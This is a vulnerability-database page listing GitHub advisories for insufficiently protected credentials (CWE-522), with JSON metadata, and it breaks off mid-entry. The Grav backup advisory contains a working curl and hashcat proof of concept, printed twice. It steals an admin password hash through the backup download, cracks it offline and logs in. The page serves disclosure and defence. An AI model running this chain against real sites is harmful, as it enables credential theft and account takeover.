Common Weakness Enumeration

CWE-522

Allowed-with-Review

Insufficiently Protected Credentials

Abstraction: Class · Status: Incomplete

The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.

1820 vulnerabilities reference this CWE, most recent first.

GHSA-2C8X-3PPX-9GJ3

Vulnerability from github – Published: 2022-05-24 22:28 – Updated: 2022-05-24 22:28
VLAI
Details

A flaw was found in ceph-dashboard. The JSON Web Token (JWT) used for user authentication is stored by the frontend application in the browser’s localStorage which is potentially vulnerable to attackers via XSS attacks. The highest threat from this vulnerability is to data confidentiality and integrity.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-27839"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-05-26T22:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was found in ceph-dashboard. The JSON Web Token (JWT) used for user authentication is stored by the frontend application in the browser\u2019s localStorage which is potentially vulnerable to attackers via XSS attacks. The highest threat from this vulnerability is to data confidentiality and integrity.",
  "id": "GHSA-2c8x-3ppx-9gj3",
  "modified": "2022-05-24T22:28:03Z",
  "published": "2022-05-24T22:28:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27839"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901330"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-2CG7-8M86-P9R3

Vulnerability from github – Published: 2025-11-11 09:30 – Updated: 2025-11-11 09:30
VLAI
Details

A 3rd-party component exposed its password in process arguments, allowing for low-privileged users to access it.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-6571"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-11T07:15:35Z",
    "severity": "MODERATE"
  },
  "details": "A 3rd-party component\u00a0exposed its password in process arguments, allowing for low-privileged users to access it.",
  "id": "GHSA-2cg7-8m86-p9r3",
  "modified": "2025-11-11T09:30:30Z",
  "published": "2025-11-11T09:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6571"
    },
    {
      "type": "WEB",
      "url": "https://www.axis.com/dam/public/1f/f8/f0/cve-2025-6571pdf-en-US-504216.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2CXP-92Q3-3PW5

Vulnerability from github – Published: 2022-05-24 17:09 – Updated: 2022-05-24 17:09
VLAI
Details

In GolfBuddy Course Manager 1.1, passwords are sent (with base64 encoding) via a GET request.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-9337"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-02-26T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In GolfBuddy Course Manager 1.1, passwords are sent (with base64 encoding) via a GET request.",
  "id": "GHSA-2cxp-92q3-3pw5",
  "modified": "2022-05-24T17:09:43Z",
  "published": "2022-05-24T17:09:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9337"
    },
    {
      "type": "WEB",
      "url": "https://github.com/0xEmma/CVEs/blob/master/CVEs/CVE-2020-9337-Golf-Buddy-Insecure-Passwords.md"
    },
    {
      "type": "WEB",
      "url": "https://help.golfbuddyglobal.com/sList.asp?searchproduct=29\u0026searchcategory=5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-2F5G-M75X-XPHF

Vulnerability from github – Published: 2026-02-27 12:31 – Updated: 2026-03-02 18:31
VLAI
Details

Hardcoded Email Credentials Saved as Plaintext in Firmware (CWE-256: Plaintext Storage of a Password) vulnerability in Frick Controls Quantum HD version 10.22 and prior lead to unauthorized access, exposure of sensitive information, and potential misuse or system compromise This issue affects Frick Controls Quantum HD version 10.22 and prior.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-21660"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-256",
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-27T10:16:22Z",
    "severity": "MODERATE"
  },
  "details": "Hardcoded Email Credentials Saved as Plaintext in Firmware (CWE-256: Plaintext Storage of a Password) vulnerability in Frick Controls Quantum HD version 10.22 and prior\u00a0lead to unauthorized access, exposure of sensitive information, and potential misuse or system compromise\nThis issue affects Frick Controls Quantum HD version 10.22 and prior.",
  "id": "GHSA-2f5g-m75x-xphf",
  "modified": "2026-03-02T18:31:41Z",
  "published": "2026-02-27T12:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21660"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-057-01"
    },
    {
      "type": "WEB",
      "url": "https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-2F86-9CP8-6HCF

Vulnerability from github – Published: 2026-06-18 14:31 – Updated: 2026-06-18 14:31
VLAI
Summary
Grav: Admin Backup Zip File Exposes Account Credentials and Configuration Secrets
Details

Summary

An authenticated administrator with backup permissions can download a ZIP archive containing the full Grav installation root, including user/accounts/admin.yaml with the admin's bcrypt password hash and email, plus user/config/ with all site configuration. The download endpoint requires only the session-static admin-nonce in the URL, no additional form-level CSRF token, and reveals the server's full filesystem path in a Base64-encoded query parameter. Combined with the absence of login rate limiting on http://{Grav_URL}/admin, an attacker who obtains a single admin-nonce value (via Referrer leakage, browser history, or XSS) can exfiltrate password hashes for offline cracking and achieve account takeover.

Details

The vulnerability chain spans three components in the deployed Grav source tree at /var/www/html/grav/:

1. Backup archive scope — Backups::backup()
/var/www/html/grav/system/src/Grav/Common/Backup/Backups.php:201-272

The backup() static method creates a ZIP of the directory specified by the backup profile's root property. The default profile (ID 0, named default_site_backup) backs up the entire Grav root directory. On line 225, when the root is not a stream URI, it falls back to the full installation path:

// Backups.php:225
$backup_root = rtrim(GRAV_ROOT . $backup->root, DS) ?: DS;

Since the default profile ships with no root override, $backup->root is empty, making $backup_root equal to GRAV_ROOT — i.e. /var/www/html/grav/. The archive therefore captures the entire installation including:

  • /var/www/html/grav/user/accounts/ — admin password hash, email, full name, granular permissions
  • /var/www/html/grav/user/config/ — system settings, potentially email SMTP credentials

The exclude_files and exclude_paths options on lines 232-235 are empty by default and offer no protection against including account files.

2. Backup download handler — AdminController::taskBackup()
/var/www/html/grav/user/plugins/admin/classes/plugin/AdminController.php:517-573

After creating the backup ZIP, the controller Base64-encodes the full filesystem path and embeds it directly in a download URL displayed to the admin:

// AdminController.php:558-560
$download = urlencode(base64_encode($backup));
$url = rtrim(...) . '/task' . $param_sep . 'backup/download' . $param_sep
       . $download . '/admin-nonce' . $param_sep . Utils::getNonce('admin-form');

The download handler (lines 532-541) decodes the path, locates the file via the backup:// stream, and serves it with Utils::download($file, true). It performs only two checks: the filename must end in .zip and the file must actually exist. It does not verify the file belongs to the requesting user, does not enforce a form-level nonce, and does not tie the download to a specific session.

3. Nonce validation — permissive
The backup route is protected only by the admin-nonce parameter appended to the URL path. This nonce is session-static and shared across every admin page. No form-nonce is required — unlike page saves or configuration changes which demand both admin-nonce and form-nonce. This makes the backup download exploitable via a single crafted GET request from any attacker who knows the nonce value.

PoC

Prerequisites: Admin session with valid admin-nonce.

Step 1 — Authenticate and extract the session-static nonces:

# Get login page, extract login-nonce, authenticate
NONCE=$(curl -s -c /tmp/jar "http://127.0.0.1/grav/admin" \
  | grep -oP 'name="login-nonce" value="\K[^"]+')
curl -s -b /tmp/jar -c /tmp/jar -X POST "http://127.0.0.1/grav/admin" \
  --data-urlencode "data[username]=admin" \
  --data-urlencode "data[password]=Passw0rd123!" \
  --data-urlencode "task=login" \
  --data-urlencode "login-nonce=${NONCE}"

# Extract the admin-nonce (same value on every admin page)
ADMIN_NONCE=$(curl -s -b /tmp/jar "http://127.0.0.1/grav/admin" \
  | grep -oP 'admin-nonce[:=]\K[a-f0-9]+' | head -1)
echo "Admin nonce: $ADMIN_NONCE"   # e.g. 68d6b108bc1398028365fb35ea760baf

Step 2 — Trigger a backup (single GET, no form-nonce needed):

curl -s -b /tmp/jar \
  "http://127.0.0.1/grav/admin/tools/backups.json/task:backup/admin-nonce:${ADMIN_NONCE}"

Response:

{
  "status": "success",
  "message": "Your backup is ready for download. <a href=\"/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:68d6b108...\" class=\"button\">Download backup</a>"
}

Step 3 — Extract the Base64 download token and fetch the ZIP:

# The download path is base64("/var/www/html/grav/backup/default_site_backup--20260616122449.zip")
# This reveals the full server filesystem path.
curl -s -b /tmp/jar -o /tmp/backup.zip \
  "http://127.0.0.1/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:${ADMIN_NONCE}"

Step 4 — Extract the password hash from the ZIP:

unzip -p /tmp/backup.zip "user/accounts/admin.yaml"

Output:

state: enabled
email: admin@grav.com
fullname: 'Grav Admin'
title: Administrator
access:
  admin:
    login: true
    super: true
  site:
    login: true
hashed_password: $2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m

Step 5 — Crack the bcrypt hash offline:

echo '$2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m' > hash.txt
hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Step 6 — Log in with the cracked password (no rate limit):

curl -s -b /tmp/jar -c /tmp/jar -X POST "http://127.0.0.1/grav/admin" \
  --data-urlencode "data[username]=admin" \
  --data-urlencode "data[password]=<cracked_password>" \
  --data-urlencode "task=login" \
  --data-urlencode "login-nonce=${NONCE}"

Impact

  • Type: Authenticated sensitive data exposure enabling offline credential theft
  • Attack surface: Any actor who can obtain admin-nonce (session fixation, reflected XSS, Referrer header leakage, browser history inspection, or proxy log access)
  • Exposed data: Admin username, email, full name, granular permission structure, bcrypt password hash ($2y$12$...), and full site configuration from user/config/
  • Downstream risk: Offline hashcat cracking bypasses all server-side brute-force protections. With no login rate limiting (Finding 1), a cracked hash grants immediate unrestricted admin access including file modification and arbitrary code execution potential through Twig/themes
  • Server path leakage: The Base64-encoded download token reveals the absolute filesystem path /var/www/html/grav/backup/ — information critical for LFI, file-write, and path traversal attacks
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.53"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55885"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312",
      "CWE-522"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T14:31:13Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nAn authenticated administrator with backup permissions can download a ZIP archive containing the full Grav installation root, including `user/accounts/admin.yaml` with the admin\u0027s bcrypt password hash and email, plus `user/config/` with all site configuration. The download endpoint requires only the session-static `admin-nonce` in the URL, no additional form-level CSRF token, and reveals the server\u0027s full filesystem path in a Base64-encoded query parameter. Combined with the absence of login rate limiting on `http://{Grav_URL}/admin`, an attacker who obtains a single admin-nonce value (via Referrer leakage, browser history, or XSS) can exfiltrate password hashes for offline cracking and achieve account takeover.\n\n### Details\nThe vulnerability chain spans three components in the deployed Grav source tree at `/var/www/html/grav/`:\n\n**1. Backup archive scope \u2014 `Backups::backup()`**  \n`/var/www/html/grav/system/src/Grav/Common/Backup/Backups.php:201-272`\n\nThe `backup()` static method creates a ZIP of the directory specified by the backup profile\u0027s `root` property. The default profile (ID `0`, named `default_site_backup`) backs up the entire Grav root directory. On line 225, when the root is not a stream URI, it falls back to the full installation path:\n\n```php\n// Backups.php:225\n$backup_root = rtrim(GRAV_ROOT . $backup-\u003eroot, DS) ?: DS;\n```\n\nSince the default profile ships with no `root` override, `$backup-\u003eroot` is empty, making `$backup_root` equal to `GRAV_ROOT` \u2014 i.e. `/var/www/html/grav/`. The archive therefore captures the entire installation including:\n\n- `/var/www/html/grav/user/accounts/` \u2014 admin password hash, email, full name, granular permissions\n- `/var/www/html/grav/user/config/` \u2014 system settings, potentially email SMTP credentials\n\nThe `exclude_files` and `exclude_paths` options on lines 232-235 are empty by default and offer no protection against including account files.\n\n**2. Backup download handler \u2014 `AdminController::taskBackup()`**  \n`/var/www/html/grav/user/plugins/admin/classes/plugin/AdminController.php:517-573`\n\nAfter creating the backup ZIP, the controller Base64-encodes the full filesystem path and embeds it directly in a download URL displayed to the admin:\n\n```php\n// AdminController.php:558-560\n$download = urlencode(base64_encode($backup));\n$url = rtrim(...) . \u0027/task\u0027 . $param_sep . \u0027backup/download\u0027 . $param_sep\n       . $download . \u0027/admin-nonce\u0027 . $param_sep . Utils::getNonce(\u0027admin-form\u0027);\n```\n\nThe download handler (lines 532-541) decodes the path, locates the file via the `backup://` stream, and serves it with `Utils::download($file, true)`. It performs only two checks: the filename must end in `.zip` and the file must actually exist. It does **not** verify the file belongs to the requesting user, does **not** enforce a form-level nonce, and does **not** tie the download to a specific session.\n\n**3. Nonce validation \u2014 permissive**  \nThe backup route is protected only by the `admin-nonce` parameter appended to the URL path. This nonce is session-static and shared across every admin page. No `form-nonce` is required \u2014 unlike page saves or configuration changes which demand both `admin-nonce` and `form-nonce`. This makes the backup download exploitable via a single crafted GET request from any attacker who knows the nonce value.\n\n### PoC\n**Prerequisites:** Admin session with valid `admin-nonce`.\n\n**Step 1 \u2014 Authenticate and extract the session-static nonces:**\n```bash\n# Get login page, extract login-nonce, authenticate\nNONCE=$(curl -s -c /tmp/jar \"http://127.0.0.1/grav/admin\" \\\n  | grep -oP \u0027name=\"login-nonce\" value=\"\\K[^\"]+\u0027)\ncurl -s -b /tmp/jar -c /tmp/jar -X POST \"http://127.0.0.1/grav/admin\" \\\n  --data-urlencode \"data[username]=admin\" \\\n  --data-urlencode \"data[password]=Passw0rd123!\" \\\n  --data-urlencode \"task=login\" \\\n  --data-urlencode \"login-nonce=${NONCE}\"\n\n# Extract the admin-nonce (same value on every admin page)\nADMIN_NONCE=$(curl -s -b /tmp/jar \"http://127.0.0.1/grav/admin\" \\\n  | grep -oP \u0027admin-nonce[:=]\\K[a-f0-9]+\u0027 | head -1)\necho \"Admin nonce: $ADMIN_NONCE\"   # e.g. 68d6b108bc1398028365fb35ea760baf\n```\n\n**Step 2 \u2014 Trigger a backup (single GET, no form-nonce needed):**\n```bash\ncurl -s -b /tmp/jar \\\n  \"http://127.0.0.1/grav/admin/tools/backups.json/task:backup/admin-nonce:${ADMIN_NONCE}\"\n```\n\nResponse:\n```json\n{\n  \"status\": \"success\",\n  \"message\": \"Your backup is ready for download. \u003ca href=\\\"/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:68d6b108...\\\" class=\\\"button\\\"\u003eDownload backup\u003c/a\u003e\"\n}\n```\n\n**Step 3 \u2014 Extract the Base64 download token and fetch the ZIP:**\n```bash\n# The download path is base64(\"/var/www/html/grav/backup/default_site_backup--20260616122449.zip\")\n# This reveals the full server filesystem path.\ncurl -s -b /tmp/jar -o /tmp/backup.zip \\\n  \"http://127.0.0.1/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:${ADMIN_NONCE}\"\n```\n\n**Step 4 \u2014 Extract the password hash from the ZIP:**\n```bash\nunzip -p /tmp/backup.zip \"user/accounts/admin.yaml\"\n```\n\nOutput:\n```yaml\nstate: enabled\nemail: admin@grav.com\nfullname: \u0027Grav Admin\u0027\ntitle: Administrator\naccess:\n  admin:\n    login: true\n    super: true\n  site:\n    login: true\nhashed_password: $2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m\n```\n\n**Step 5 \u2014 Crack the bcrypt hash offline:**\n```bash\necho \u0027$2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m\u0027 \u003e hash.txt\nhashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt\n```\n\n**Step 6 \u2014 Log in with the cracked password (no rate limit):**\n```bash\ncurl -s -b /tmp/jar -c /tmp/jar -X POST \"http://127.0.0.1/grav/admin\" \\\n  --data-urlencode \"data[username]=admin\" \\\n  --data-urlencode \"data[password]=\u003ccracked_password\u003e\" \\\n  --data-urlencode \"task=login\" \\\n  --data-urlencode \"login-nonce=${NONCE}\"\n```\n\n### Impact\n- **Type:** Authenticated sensitive data exposure enabling offline credential theft\n- **Attack surface:** Any actor who can obtain admin-nonce (session fixation, reflected XSS, Referrer header leakage, browser history inspection, or proxy log access)\n- **Exposed data:** Admin username, email, full name, granular permission structure, bcrypt password hash (`$2y$12$...`), and full site configuration from `user/config/`\n- **Downstream risk:** Offline hashcat cracking bypasses all server-side brute-force protections. With no login rate limiting (Finding 1), a cracked hash grants immediate unrestricted admin access including file modification and arbitrary code execution potential through Twig/themes\n- **Server path leakage:** The Base64-encoded download token reveals the absolute filesystem path `/var/www/html/grav/backup/` \u2014 information critical for LFI, file-write, and path traversal attacks",
  "id": "GHSA-2f86-9cp8-6hcf",
  "modified": "2026-06-18T14:31:13Z",
  "published": "2026-06-18T14:31:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-2f86-9cp8-6hcf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Grav: Admin Backup Zip File Exposes Account Credentials and Configuration Secrets"
}

GHSA-2FM2-P76R-3MV9

Vulnerability from github – Published: 2022-05-24 22:28 – Updated: 2022-10-25 19:00
VLAI
Details

The sensitive information of webcam device is not properly protected. Remote attackers can unauthentically grant administrator’s credential and further control the devices.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-30168"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-04-28T10:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The sensitive information of webcam device is not properly protected. Remote attackers can unauthentically grant administrator\u2019s credential and further control the devices.",
  "id": "GHSA-2fm2-p76r-3mv9",
  "modified": "2022-10-25T19:00:21Z",
  "published": "2022-05-24T22:28:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30168"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/keniver/86ebef688fb274b534da51ef1a84dd3e"
    },
    {
      "type": "WEB",
      "url": "https://www.chtsecurity.com/news/0b733a38-e616-4ff3-86a6-13e710643388"
    },
    {
      "type": "WEB",
      "url": "https://www.meritlilin.com/assets/uploads/support/file/M00166-TW.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-4678-aad70-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2FR7-CC7P-P45Q

Vulnerability from github – Published: 2023-12-05 19:45 – Updated: 2023-12-05 19:45
VLAI
Summary
Data leak of password hash through change requests
Details

Impact

Change request allows to edit any page by default, and the changes are then exported in an XML that anyone can download. So it's possible for an attacker to obtain password hash of users by performing edition of the user profiles and then downloading the XML that has been created. This is also true for any document that might contain password field and that a user can view. This vulnerability impacts all version of Change Request, but the impact depends on the rights that has been set on the wiki since it requires for the user to have the Change request right (allowed by default) and view rights on the page to target. Also the issue cannot be easily exploited in an automated way.

Patches

The patch consists in denying to users the right of editing pages that contains a password field with change request. It means that already existing change request for those pages won't be removed by the patch, administrators needs to take care of it.

The patch is provided in Change Request 1.10, administrators should upgrade immediately.

Workarounds

It's possible to workaround the vulnerability by denying manually the Change request right on some spaces, such as XWiki space which will include any user profile by default.

References

  • JIRA issue: https://jira.xwiki.org/browse/CRAPP-302
  • Commit of the fix: https://github.com/xwiki-contrib/application-changerequest/commit/ff0f5368ea04f0e4aa7b33821c707dc68a8c5ca8

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List

Attribution

Thanks Michael Hamann for the report.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.contrib.changerequest:application-changerequest-default"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.1"
            },
            {
              "fixed": "1.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-49280"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-522"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-05T19:45:33Z",
    "nvd_published_at": "2023-12-04T23:15:26Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nChange request allows to edit any page by default, and the changes are then exported in an XML that anyone can download. So it\u0027s possible for an attacker to obtain password hash of users by performing edition of the user profiles and then downloading the XML that has been created. This is also true for any document that might contain password field and that a user can view.\nThis vulnerability impacts all version of Change Request, but the impact depends on the rights that has been set on the wiki since it requires for the user to have the Change request right (allowed by default) and view rights on the page to target. \nAlso the issue cannot be easily exploited in an automated way. \n\n### Patches\n\nThe patch consists in denying to users the right of editing pages that contains a password field with change request. It means that already existing change request for those pages won\u0027t be removed by the patch, administrators needs to take care of it. \n\nThe patch is provided in Change Request 1.10, administrators should upgrade immediately. \n\n### Workarounds\n\nIt\u0027s possible to workaround the vulnerability by denying manually the Change request right on some spaces, such as XWiki space which will include any user profile by default. \n\n### References\n\n  * JIRA issue: https://jira.xwiki.org/browse/CRAPP-302\n  * Commit of the fix: https://github.com/xwiki-contrib/application-changerequest/commit/ff0f5368ea04f0e4aa7b33821c707dc68a8c5ca8\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n\n### Attribution\n\nThanks Michael Hamann for the report. ",
  "id": "GHSA-2fr7-cc7p-p45q",
  "modified": "2023-12-05T19:45:33Z",
  "published": "2023-12-05T19:45:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki-contrib/application-changerequest/security/advisories/GHSA-2fr7-cc7p-p45q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49280"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki-contrib/application-changerequest/commit/ff0f5368ea04f0e4aa7b33821c707dc68a8c5ca8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki-contrib/application-changerequest"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/CRAPP-302"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Data leak of password hash through change requests"
}

GHSA-2FXC-VHRX-CQC7

Vulnerability from github – Published: 2022-04-13 00:00 – Updated: 2022-04-21 00:00
VLAI
Details

Dell PowerScale OneFS, versions 8.2.2 and above, contain a password disclosure vulnerability. An unprivileged local attacker could potentially exploit this vulnerability, leading to account take over.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-22550"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-04-12T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Dell PowerScale OneFS, versions 8.2.2 and above, contain a password disclosure vulnerability. An unprivileged local attacker could potentially exploit this vulnerability, leading to account take over.",
  "id": "GHSA-2fxc-vhrx-cqc7",
  "modified": "2022-04-21T00:00:50Z",
  "published": "2022-04-13T00:00:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22550"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/000195815"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2GH8-GX83-42H9

Vulnerability from github – Published: 2022-05-24 16:46 – Updated: 2024-04-04 00:43
VLAI
Details

LemonLDAP::NG -2.0.3 has Incorrect Access Control.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-12046"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-05-22T16:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "LemonLDAP::NG -2.0.3 has Incorrect Access Control.",
  "id": "GHSA-2gh8-gx83-42h9",
  "modified": "2024-04-04T00:43:39Z",
  "published": "2022-05-24T16:46:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12046"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/commits/master"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/issues/1742"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/issues/1743"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/issues/1744"
    },
    {
      "type": "WEB",
      "url": "https://lemonldap-ng.org/download"
    },
    {
      "type": "WEB",
      "url": "https://projects.ow2.org/view/lemonldap-ng/lemonldap-ng-1-9-19-is-out"
    },
    {
      "type": "WEB",
      "url": "https://projects.ow2.org/view/lemonldap-ng/lemonldap-ng-2-0-4-is-out"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/May/38"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2GX2-4QJJ-49CH

Vulnerability from github – Published: 2026-04-14 18:30 – Updated: 2026-04-14 18:30
VLAI
Details

A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to retrieve passwords for multiple installed connectors via server address modification in connector configuration.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-22576"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-257",
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-14T16:16:36Z",
    "severity": "MODERATE"
  },
  "details": "A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to retrieve passwords for multiple installed connectors via server address modification in connector configuration.",
  "id": "GHSA-2gx2-4qjj-49ch",
  "modified": "2026-04-14T18:30:35Z",
  "published": "2026-04-14T18:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
